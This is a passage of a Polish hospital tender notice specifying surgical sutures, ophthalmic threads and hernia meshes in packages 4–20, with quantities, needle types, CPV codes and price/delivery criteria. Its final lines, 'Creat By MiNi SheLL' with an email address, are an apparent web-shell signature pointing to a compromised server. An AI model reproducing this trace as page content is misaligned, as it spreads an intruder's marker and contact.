<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow
Plecionka, syntetyczna, wchłanialna zbudowana z polimeru kwasu glikolowego i mlekowego, powlekana, antybakteryjna o okresie
1	2/0	okrągła rozwarstwiająca 30mm +/-3mm  1/2 koła 	 	 	70	36	40
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce
podtrzymywania tkanki ok..25% po 28 dniach i okresie całkowitego wchłonięcia szwu 56 do 70 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5 - NICI WCHŁANIALNE 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow
Jednowłóknowa, syntetyczna nić wchłanialna wykonana z  polidwuoksanonu o okresie podtrzymywania tkanki ok 70 dni po implantacji i czasie całkowitego wchłonięcia 180-210 dni
1	2	okrągła o zakończeniu trokarowym  48mm +/-3mm  1/2 koła 	 	 	150 pętla	24	10
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6 - NICI WCHŁANIALNE 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow
Jednowłóknowa, syntetyczna nić wchłaniana wykonana z poli-4hydroksybutyratu o okresie podtrzymywania tkanki 50%- 90 dni, czas całkowitego wchłonięcia około 13 miesięcy
1	1	okrągła pogrubiona 40mm +/-3mm  1/2 koła 	 	 	150 pętla	24	10
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7 - NICI NIEWCHŁANIALNE 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/-1mm	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Jednowłóknowa nić syntetyczna  niewchłanialna poliamidowa
1	5/0	odwotnie tnąca, 3/8 koła 12mm 	 	 	45	36	1
2	4/0	odwotnie tnąca, 3/8 koła 16mm	 	 	75	36	1
3	4/0	odwotnie tnąca, 3/8 koła 19mm 	 	 	75	36	24
4	3/0	odwotnie tnąca, 3/8 koła 24mm	 	 	75	36	44
5	2/0	odwotnie tnąca, 3/8 koła 24mm	 	 	75	36	28
6	0	odwotnie tnąca, 3/8 koła 24mm	 	 	75	36	8
7	0	odwrotnie tnąca 3/8 koła 30mm	 	 	75	36	8
8	1	odwrotnie tnąca 3/8 koła 30 mm	 	 	75	36	4
9	2/0	odwrotnie tnąca, 3/8 koła 30mm	 	 	75	36	1
10	1	bez igły	 	 	2x100cm	36	1
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8 - NICI NIEWCHŁANIALNE 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp UPS Opis igły +/-1mm kod nazwa długość nici /+10% Ilość saszetek w opakow. Zamawiana ilość opakow.
Nić pleciona niewchłanialna syntetyczna poliestrowa powlekana (rdzeń opleciony kilkoma spoistymi splotami)
1	0	1/2 koła, pojedyńcza, okrągła z zakończeniem trokarowym 26mm +/-1mm	 	 	75-90	36	20
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET NR 9 - NICI NIEWCHŁANIALNE 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/-1mm	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Szew polipropylenowy, monofilament niewchłanialny
1	3/0	okrągła 21-22mm 1/2 koła 	 	 	75	36	8
2	3/0	okrągła 17mm 1/2 koła 	 	 	75	36	4
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET NR 10 - NICI NIEWCHŁANIALNE 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/-1mm	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Stalowy szew chirurgiczny zapobiegający rozejściu się rany pooperacyjnej
1	1.3mm	2 igły odwrotnie tnące,  3/8 koła 100mm; 2 podkladki polietylenowe	 	 	90	4	8
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET NR 11 - NICI NIEWCHŁANIALNE 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/-1mm	kod	nazwa	długość nici /+10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Skręcana nić naturalna lniana niewchłanialna - len , powlekana	 	 
1	0	bez igły	 	 	150	36	1
2	1	bez igły	 	 	150	36	1
 	 	 	 	 	 	 	 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET NR 12 - NICI OKULISTZCYNE 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/- 0,05	kod	nazwa	długość nici +/-10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Nić jednowłóknowa,syntetyczna, niewchłanialna poliamidowa	 	 	 
1	10/0	5,6 mm 1/2 koła igła szpatułkowa z mikroostrzem podwójna	 	 	30	12	1
2	10/0	6,5-6,6 mm 3/8 koła igła szpatułkowa z mikroostrzem podwójna	 	 	30	12	6
3	9/0	6,5-6,6 mm 3/8 koła igła szpatułkowa z mikroostrzem podwójna	 	 	30	12	8
 	 	 	 	 	 	 	 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET NR 13 - NICI OKULISTYCZNE 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/- 0,05	kod	nazwa	długość nici +/-10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Nić niewchłanialna jedwabna impregnowana
1	4/0	 16mm, 3/8 koła, odwrotnie  lub konwencjonalnie tnąca, igła pojedyńcza	 	 	75	36	8
2	5/0	 16mm, 3/8 koła  odwrotnie lub konwencjonalnie tnąca, igła pojedyńcza	 	 	75	36	4
3	5/0	 12-13 mm, 3/8 koła  odwrotnie lub konwencjonalnie tnąca, igła pojedyńcza	 	 	75	36	1
4	6/0	11mm, 3/8 koła igła z mikroostrzem odwrotnie tnąca  podwójna	 	 	45	12	8
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET NR 14 - NICI OKULISTZCYNE 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/- 0,05	kod	nazwa	długość nici +/-10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Nić syntetyczna, pleciona, niewchłanialna poliester powlekany 			
1	4/0	igła podwójna szpatułkowa 8,0 mm 1/4 koła   	 	 	45	12	1
2	5/0	igła podwójna szpatułkowa 8,0 mm 1/4 koła   	 	 	45	12	1
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET NR 15 - NICI OKULISTYCZNE 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/- 0,05	kod	nazwa	długość nici +/-10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Nić niewchłanialna jedwabna impregnowana					
1	7/0	7-8mm, 3/8 koła, igła z mikroostrzem odwrotnie tnąca  podwójna	 	 	45	12	4
2	8/0	6,5-6,6mm,  3/8 koła szpatułka z mikroostrzem,  podwójna	 	 	30	12	2
 	 	 	 	 	 	 	 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET NR 16 - NICI OKULISTZCYNE 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/- 0,05	kod	nazwa	długość nici +/-10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Plecionka, syntetyczna, wchłanialna zbudowana z polimeru kwasu glikolowego i mlekowego, powlekana o okresie podtrzymywania tkanki 25% po 28 dniach i okresie całkowitego wchłonięcia szwu 56 do 70 dni.
1	8/0	6,5-6,6mm,  3/8 koła szpatułka z mikroostrzem,  podwójna	 	 	30	12	1
2	7/0	6,5-6,6mm,  3/8 koła szpatułka z mikroostrzem,  podwójna	 	 	45	12	1
3	6/0	igła podwójna szpatułkowa 8,0 mm 1/4 koła   	 	 	45	12	4
4	5/0	igła podwójna szpatułkowa 8,0 mm 1/4 koła   	 	 	45	12	2
5	4/0	okrągła 17mm +/-2mm 1/2 koła	 	 	70	36	1
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PAKIET NR 17 - NICI OKULISTYCZNE 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/- 0,05	kod	nazwa	długość nici +/-10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Nić syntetyczna, polipropylenowa, niewchłanialna monofilamentowa		
1	10/0	igła podwójna 16,0 mm  szpatułka prosta z mikroostrzem	 	 	22-23	12	1
2	10/0	igła podwójna 1/4 koła typu PC-9 do podszycia soczewek	 	 		12	1
 	 	 	 	 	 	 	 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET NR 18 - NICI OKULISTZCYNE 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	UPS	Opis igły +/- 0,05	kod	nazwa	długość nici +/-10%	Ilość saszetek w opakow.	Zamawiana ilość opakow.
Nić syntetyczna, poliamidowa, niewchłanialna monofilamentowa
1	8/0	igła 8mm 1/2 koła , odwrotnie tnąca	 	 	45	12	1
2	11/0	igła podwójna 6,5mm, 3/8 koła szpatułkowa z mikroostrzem	 	 	30	12	1
 	 	 	 	 	 	 	 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagany jest bezpośredni dostęp do igły po otwarciu saszetki
3. Wymagany jest  kod  kreskowy lub metryczkowy na saszetce.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET NR 19 - SIATKI PRZEPUKLINOWE 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Opis	kod	nazwa	Ilość szt. w opakowaniu	Zamawiana ilość opakow.
Siatka polipropylenowa, monofilamentowa, niewchłanialna, lekka, elastyczna we wszystkich kierunkach, o dużych porach  grubość 0,55 mm , waga 48g/m2, rozmiar porów 3,6mm x 2,8mm
					
1	Siatka o wym. 7,5 cm x 15 cm   	 	 	5	20
2	Siatka o wym. 15 cm x 15 cm   	 	 	5	4
3	Siatka o wym. 20 cm x 30 cm   	 	 	1	4
 	 	 	 	 	 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagane są samoprzylepne naklejki dla dokumentacji na każdym pojedynczym opakowaniu siatki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET NR 20 - SIATKI PRZEPUKLINOWE 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Opis	kod	nazwa	Ilość szt. w opakowaniu	Zamawiana ilość opakow.
Siatka polipropylenowa, monofilamentowa, niewchłanialna, lekka, waga siatki 36 g/m2, przezroczysta, cienkościenna grubość 0,39mm, wielkość porów 1mm
1	Siatka o wym. 7,5 cm x 15 cm   	 	 	5	1
2	Siatka o wym. 15 cm x 15 cm   	 	 	5	1
3	Siatka o wym. 20 cm x 20 cm   	 	 	5	4
 	 	 	 	 	 
Wymagania:
1. W każdym opakowaniu zbiorczym winna znajdować się instrukcja użytkowania w języku polskim (przy każdej dostawie).
2. Wymagane są samoprzylepne naklejki dla dokumentacji na każdym pojedynczym opakowaniu siatki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostaw Cito - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com